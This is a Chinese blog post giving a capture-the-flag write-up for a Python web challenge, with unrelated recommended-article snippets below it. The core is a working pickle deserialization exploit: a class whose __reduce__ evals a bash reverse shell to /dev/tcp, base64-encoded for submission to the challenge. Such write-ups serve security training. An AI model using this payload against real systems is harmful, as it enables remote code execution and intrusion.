Web-myfavorPython--第二届黄河流域公安院校网络空间安全技能邀请赛

最新推荐文章于 2024-06-13 02:48:16 发布
最新推荐文章于 2024-06-13 02:48:16 发布
阅读量175 收藏
点赞数 1
分类专栏: 第二届黄河流域公安院校网络空间安全技能邀请赛 文章标签: 前端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sa1nZen/article/details/139046164
版权
一、题目
题目:myfavorPython
题目描述:
二、WriteUp
1. 功能探测
访问http://127.0.0.1:5000/register
成功注册后

在这里插入图片描述

2. 思路:将序列化的字节流base64编码

import pickle
import os
import base64
import pickletools

cmd = "__import__(\"os\").popen('bash -c \"/bin/bash -i >& /dev/tcp/ip/port 0>&1\"').read()"

class A(object):
    def __reduce__(self): #反序列化时自动调用
        return (eval,(cmd,)) 
        #Python中的元组可以使用圆括号表示,并且可以通过在元素后面加上逗号来创建一个只有一个元素的元组。这种语法是为了区分括号内只有一个元素时,与普通的括号运算符混淆的情况。
        #在这里,(eval, (cmd,))是一个包含两个元素的元组。第一个元素是eval,指向eval()函数本身。第二个元素是一个包含单个元素cmd的元组,它被用作参数传递给eval()函数。
        #该元组传递给eval()函数,执行其中的代码 #子进程的输出交给read()
a=A()
b=pickle.dumps(a)   #序列化
print(base64.b64encode(b))
pickletools.dis(b)  #反汇编pickle数据流的函数

3. 拿到shell后直接cat flag.txt
三、总结
1. python反序列化学习参考链接
https://blog.csdn.net/weixin_62808713/article/details/130048382
Sa1nZen
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Google Earth Engine(GEE)——2000-2020年RSEI分析(MODIS数据)以黄河流域为例
qq_31988139的博客
03-14 6062
文中使用的数据:MOD09A1、MOD11A2和MOD13A1 代码: var MOD09A1 = ee.ImageCollection("MODIS/006/MOD09A1"), MOD11A2 = ee.ImageCollection("MODIS/006/MOD11A2"), MOD13A1 = ee.ImageCollection("MODIS/006/MOD13A1"), table = ee.FeatureCollection("users/..
Google Earth Engine —— 1986-2020年植被覆盖度一元线性回归分析(黄河流域上游为例)
qq_31988139的博客
11-12 2472
本教程使用了两种GEE中的算法完成了对一元线性回归的分析,也就是过去几十年间该区域的植被覆盖度是增加还是减少的趋势性分析。本文先将每一年GEE上计算得到的FVC值导入到ASSETS中,然后,分别导入新的一个脚本中,然后分别给36年的影像添加事件波段,最后将36年影像按照装入到一个影像集合中就完了了我们要操作的数据。返回包含给定图像的图像集合。参数。images(列表)。要包含在集合中的图像。返回。图像集合从一个元数据属性生成一个双倍类型的常量图像。
Web-Python-Revenge-第二届黄河流域公安院校网络空间安全技能邀请赛
Sa1nZen的博客
05-19 230
Web-Python-Revenge-第二届黄河流域公安院校网络空间安全技能邀请赛
黄河流域公安院校网络空间安全技能挑战赛 QAQ 题解
OrientalGlass的博客
03-05 605
这题是对python打包成的可执行程序逆向。
第二届黄河流域网络安全技能挑战赛WP
How2Badlion的博客
05-13 1009
TIP:可以留言给我换友链捏 第一次打ctf 之前只会做服务器取证 不知道为什么就第二了 可能运气比较好吧 由于我自己目前在取证工作中,也遇到很多ctf的问题,我个人非常喜欢做ctf的题目,但也会遇到ctf问题难以破解,全网ctf教程我都看完了,但是都觉得不够具体,所以我写一篇博客,希望以最具体的,实操演示的方式,向大家说明ctf的原理,希望与大家一起进步!
黄河流域公安院校网络空间安全技能挑战赛】部分wp
leekos的博客,分享web安全相关知识~
03-07 889
黄河流域公安院校网络空间安全技能挑战赛】部分wp
黄河流域公安院校网络空间安全技能挑战赛
qq_63928796的博客
03-04 369
里让b为真就可以调用c中的sdpc方法,参数是welcom,再利用A类可以调用Evil中的getflag。将一句话木马包含在日志里并写到test.php中。php7.4有一个源码泄露的漏洞。pearcmd的利用,日志包含。考察PHP 的运算符比较级。
python气象可视化第二弹-黄河流域白化
weixin_43347581的博客
06-10 3642
maskout是比较python+cartopy实现白化功能的一个比较好用的子程序。(1)在应用的过程中要注意相关的shp文件应该是地理坐标系,如果不是的话要转化坐标系。(详情参考:如何使用arcmap转换shp文件坐标系)(2)注意选择合适的region,尽量选择具有代表性的record。...
PIE-engine 教程 ——提取黄河流域/山西省1980—2018年流域降水量并对比分析
qq_31988139的博客
09-25 1410
这里面我们首先要上传我们自己的研究区,然后加载每一年的数据降水数据,通过系数转化,完成正常降水量的展示,我们通过对reduceregion的统计,分别算出平均降水量,分辨率设定为1000米,最后加载影像的chart折线图,用于存放坐标横轴时间和纵轴的对象(降水),这里我们首先看一下降水数据。中国区域地面气象要素驱动数据年度合成产品(1979-2018),包括近地面气温、近地面气压、近地面空气比湿、近地面全速、地面向下短波辐射、地面向下长波辐射、地面降水率共7个要素。统计类型,包括最大值、最小值和求和。
黄河流域典型矿区生态空间网络优化研究——以鄂榆地区为例-论文
07-07
黄河流域是我国重要的生态屏障,同时分布着我国多数大型煤炭生产基地,是我国重要的能源基地。如何保障黄河流域煤矿开采与生态环境的协同发展,建设黄河流域生态文明,是当前研究的重要课题。选取黄河流域典型矿区—...
黄河流域3E 系统耦合协调发展评价与分析-论文
07-08
能源、经济和生态环境相辅相成,...从空间差异视角分析,黄河流域3E系统耦合协调发展仅处于勉强协调水平,且呈现显著的省(区) 差异,其中,青海省、四川省3E系统耦合协调发展处于中度协调水平,远高于其他省(区)。
黄河流域水-能源复合生态效率评价及影响因素研究-论文
07-08
水资源短缺与能源富集是影响黄河流域生态效率主要因素。采用Malmquist-Luenberger指数,以全社会用水量、能源消费量等作为生态投入,考虑森林覆盖率等生态期望产出以及二氧化碳排放、废水排放量等环境非期望产出,...
黄河流域煤炭高质量发展研究-论文
07-08
通过梳理黄河流域煤炭资源赋存情况、原煤产量、产能规模及煤矿井型等主要特征指标,结合黄河流域水资源、水环境、地表植被、水土流失与水土保持、生态功能区划现状,以黄河二级子流域及内流区为基本范围,综合省市...
黄河流域能源-经济-环境协同发展的实证研究-论文
07-08
构建能源-经济-环境指标体系,基于黄河流域9省(区) 的面板数据,实证研究了黄河流域能源、经济与环境三系统的发展状况、协调关系及其关联度。结果表明:①各子系统发展水平小幅波动频繁,总体保持较为稳定的发展...
[Vue-常见错误]浏览器显示Uncaught runtime errors
一个喜欢什么都研究一下的小小后端程序员
06-09 305
在vue.config.js中配置关闭Uncaught runtime errors显示。
Web前端网站设计案例:深入剖析创意与技术的完美融合
liyrbtqe_66w的博客
06-12 215
在性能优化方面,设计师通过压缩代码、减少HTTP请求、使用CDN等技术手段,提升了网站的加载速度和响应性能,为用户提供了更加流畅的访问体验。综上所述,本Web前端网站设计案例通过视觉设计、用户体验、技术实现、性能优化、创意表达、响应式设计和跨平台兼容等方面的综合考量,成功打造了一款既美观又实用的网站。这个案例充分展示了Web前端设计的魅力和潜力,为未来的网站设计提供了有益的借鉴和启示。设计师通过独特的视觉元素和创意构思,将品牌理念和文化内涵融入其中,使得整个网站在传达信息的同时,也展现出品牌的独特魅力。
vue3如何定义一个组件
Java程序员专栏
06-09 504
注意在子组件的 <template> 中,你使用 {{ propName }} 来显示传递进来的参数值。在父组件中,你使用 :propName="parentMessage" 来将 parentMessage 数据的值绑定到子组件的 propName prop 上。当使用 <script setup> 语法糖时,你不能直接在 <script> 标签内使用 props 选项。在 Vue 3 中,定义一个可以接收参数的组件通常是通过在组件的 props 选项中定义这些参数来完成的。// 其他组件逻辑...
Harmony 开发的艺术 面向对象
最新发布
不懂先生的博客
06-13 764
然后你可以创建多个子类,如“圆形”、“矩形”和“三角形”,它们都继承自“形状”类并实现了自己的“绘制”方法。尽管每个对象的类型可能不同(圆形、矩形、三角形等),但由于它们都继承了“形状”类并实现了相同的“绘制”方法,因此你可以通过父类引用来统一调用它们的方法。然后你可以创建一个“狗”类,它继承自“动物”类,并添加或覆盖一些特定的属性和方法(如“叫”和“摇尾巴”)。所以面向对象的三大特征(封装、继承、多态)在java语言中很容易实现的设计,搬到早期的JavaScript中,就变噩梦一样的存在。
hec-hms的单元流域模型如何划分子流域
05-25
HEC-HMS的单元流域模型可以通过以下步骤来划分子流域: 1. 确定主要的水文特征:首先需要考虑流域的水文特征,如坡度、土壤类型、降雨分布等。这些特征可以帮助确定流域内的水文过程和水文响应。 2. 划分子流域:根据主要的水文特征,可以将整个流域划分为若干个子流域。一般情况下,子流域应该是相对独立的,并且各自具有一定的水文特征。可以使用HEC-GeoHMS工具来辅助进行子流域划分。 3. 确定每个子流域的出口点:每个子流域都应该有一个出口点,即水流汇聚的地方。这些出口点可以是河流的交汇处、湖泊或水库的出口点等。在HEC-HMS中,可以使用“Junction”对象来表示出口点。 4. 确定每个子流域的参数:每个子流域都应该有一些参数,如面积、坡度、土壤类型、植被覆盖率等。这些参数可以通过现场调查和遥感数据来获取。在HEC-HMS中,可以使用“Subbasin”对象来表示子流域,并设置其相应的参数。 5. 连接子流域:将所有子流域和出口点连接起来,形成整个流域的模型。在HEC-HMS中,可以使用“Reach”对象来表示连接子流域的各个河段,并设置其相应的参数。 通过以上步骤,可以构建出一个基于HEC-HMS的单元流域模型,用于模拟流域内的水文过程和水文响应。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值